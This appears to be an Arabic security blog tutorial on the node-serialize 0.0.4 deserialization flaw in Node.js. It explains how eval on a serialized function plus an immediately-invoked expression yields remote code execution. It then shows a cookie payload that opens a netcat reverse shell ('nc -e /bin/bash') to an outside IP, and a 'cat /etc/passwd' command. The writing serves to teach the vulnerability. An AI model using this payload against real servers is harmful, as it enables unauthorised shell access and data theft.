Deserialization vulnerability in Node.js RCE

السلام عليكم ورحمة الله وبركاتة،

اليوم حاب اتكلم عن ثغره Deserialization في node.js راح اتطرق في الموضوع عن ثلاث محاور.



1-تعريف عن node.js

Node.js هو نظام برامج مصمم لكتابة تطبيقات إنترنت قابلة للتوسع كخوادم الويب

لاتختلف كثيرا عن برمجيات الويب ابلكيشن يوجد لديها من المكتبات والموديلز

2- سبب الثغرة وحدوثها
في عام 2017 تم اكتشاف ثغرة في دالة unserialize() تحت  مودل node-serialize 0.0.4
تسمح للمخترق باستغلال الثغرة للوصول الى remote code execution عن طريق ادخال serialized JavaScript Object مع اضافه مصطلح IIFE= () الاستدعاء التنفيذ المدخل على الفور من وقت ادخال المدخل وهي اختصار Immediately-Invoked Function Expression
لنرى الفرق بين object Serializedيحتوي على remote code execution payload
من دون  IIFE Expression
في حالة عدم وجود IIFE لايقوم Serialized object بتنفيذ البايلود
يقوم بطابعه الSerialized object للpayload من دون التنفيذ فقط
ناخذ مثال
نقوم بحفظه من ثم التنفيذ لنرى
كما نرى تم طباعه Serialize object فقط من دون التنفيذ للامر
cat /etc/passwd

الان نقوم بستخدام IIFE Expression
لنرى الفرق
نقوم بحفظ الملف ثم التنفيذ
كما نرى تم تنفيذ امر cat /etc/passwd
مع وجود IIFE Expression

طيب الان عرفنا سبب الثغرة نتجه الى سبب حدوثها 
لنفترض لدينا ان لدينا سكربت يستخدم node.js مثل مافي الصورة
من الكود نرى بوجود استدعائات للمودلز التالية

cookie-parser escape-html express node-serialize

نرى من هاذا المثال يستخدم node server يضع الكوكيز مع بروفايل اليوزر تحت serilaised object عن طريق مودل المصاب من ثم تشفير قيمه الكوكيز  الى string base64

الان نفتح مودلnode-serialize للسكربت المصاب ونرى اين الاصابه
نفتح مودل node-serialize 0.0.4 تحت رابط
نشوف سطر 41
نرى في السطر42 تم استدعاء الobject الي string ثم التحقق من الobject اذا ماتم عمل serialize ليقوم unserialized للobject في حال لم يتم التحقق يقوم بطابعه error call fuction unserialized في السطر45
من ثم 
في السطر 46 يقوم من التاكد من الobject المدخل اذا ماتم serilize  وايضا اذا كان لايحمل property function  يقوم بطاعه Can't serilize object
في سطر 75
يقوم في سطر 73 بعمل unserialize للobject المدخل من ثم في سطر 75 التاكد من الobject المدخل اذا يتحتوى على FUNCFLAG داخل ال object يقوم باستخدام دالة eval واظهار الlength للproperty FUNCTFLAG

الثغرة تكمن في استدعاء دالة eval للserialize object
تسمح للمخترق للحصول ع remote code exectuion ع الهدف
property FUNCTFLAG توجد في السطر الاول

٣- الاسغتلال

بعد ماتعرفنا على الثغرة وحدوثها نأتي الان في الاستغلال
بحيث نستدعي var FUNCFLAG في البايلود تبعنا وتحويله الى object من ثم تشفيره الى base64
ناخذ سيرفر مصاب على سبيل المثال

من خلال الفحص وجدنا بورت 666 يستخدم Node.js express framework
نقوم بفتحه من خلال المتصفح لنرى
نقوم بتفحه من من خلال Brupsuite لنرى
كما نلاحظ يوجود cookies يحتوى على base64
نتوجه الى Decoder لفك المحتوى
كما نلاحظ بوجود محتوى json
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}
نقوم الان بالاستغلال
بحكم الكود يقوم unserialize لمحتوى الcookies
عن طريق property FUNCTFLAG
كما ذكرنا فوق نقوم بعمل serialize object




ليصبح الكود هاكذا
{"r3m0t3nu11":"_$$ND_FUNC$$_function(){\n require('child_process').exec('nc -e /bin/bash 192.168.44.43 4433 /', function(error, stdout, stderr) { console.log(stdout) });\n }"}
من ثم نقوم بتشفير المحتوى الى Charcode ونظيف له دالة
eval()
من ثم اضافه بعد التشفير واضافه دالة charcode+eval

نقوم باضافه لمحتوى json
IIFE Expression

ليصبح الناتج هاكذا


نقوم الان باتشفيره base64 ومن ثم التصنت



الان نقوم بارسال المحتوى البايلود عن طريق الكوكيز من خلال brupsuite

نرجع نشوف النت كات
والنتيجة
remote code execution

اتمنى يكون الموضوع مفيد، دمتم بصحه وعافية.

تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

Html code injection-[Post-Get-StoredData!]-

صورة
السلام عليكم ورحمة الله وبركاتة،    بسم الله الرحمن الرحيم والصلاة والسلام على أشرف الخلق والمرسلين ، اليوم شرحنا راح نتكلم عن ثغرات HTML INJECTION وذلك عن طريق حقن كود HTML بالمدخل او المتغير المصاب ومحاولة استغلالها بعده طرق,  بالاول ناخذ تعريف عن   [ HTML = [ HyperText Markup Language تعني لغة توصيف النص التشعبي: wikipedia   بالعادة لغة توصيف النص التشعبي تكون بالدرجة الاولى في تصميم وتوظيف قوالب والنصوص. في الويب ابلكيشن وهاذا شيء طبيعي جدا. ولكن تكمن ثغراتها في تحقق المدخلاات مثلها مثل اي ثغرة اخرى في الويب ابلكيشن. اي  لنفرض بأن لدي صفحه في موقع معين مبني على HyperText Markup Language   بالكامل ولديه مدخل بأسم [" Search "] وليس عليه تحقيق او فلتره للمدخل في هالحاله تكمن الاصابة، ولكن تختلف المعاير في طريقة الارسال والاستقبال الحزم. وعندما اعني تختلف في الارسال اي اعني في الطلب والاستقبال من خلال طرق الارسال Hypertext ] Transfer Protocol ]= Http. وكما تسمى Http Method&*Http Verbs/ وهي في الغالب تكون مابين اثنين اكثر انتشار وهم Get ^ & ^ P
قراءة المزيد

CRLF injection [\r\n Carriage Return]

صورة
السلام عليكم ورحمة الله وبركاتة , .  في البداية ناخذ تعريف عن معنى CRLF CRLF   CR=Carriage Return   %0d 0x0D \r LF=Line feed 0x0A %0a \n ماهو crlf عندما يقوم شخص بارسال طلب من المتصفح الى السيرفر  السيرفر راح يرد بالريسبونس يحتوي على  http response headers content Carriage Return Line feed تستخدم في ملاحظه انتهاء الاين او السطر و كما نلاحظ طريقه الفصل بين Header مع الContent Carriage Return&line feed لكن تختلف من ويندوز الى لينكس  حيث الويندوز يتطلب  بانتهى السطر با crlf في بروتوكول http/https اما في لينكس  line feed  lf يتطلب  فقط في بروتوكول الhttp  اين تكمن الثغرة: الثغرة تكمن عندما يضع المبرمج مدخل يستطيع المخترق او المستخدم بالتحكم في response header مثال من بعض الامثله التحكم في الوق مثلا الان وقت الاسغلال والتصعيد من بعض خطورة crlf ممكن التصعيد الى xss ,Session Fixation,openredirect ايضا ممكن rce على حسب المحتوى من خطوره crsf ممكن استغلالها على حسب المحتوى اذا كان HTTP HEADER IN
قراءة المزيد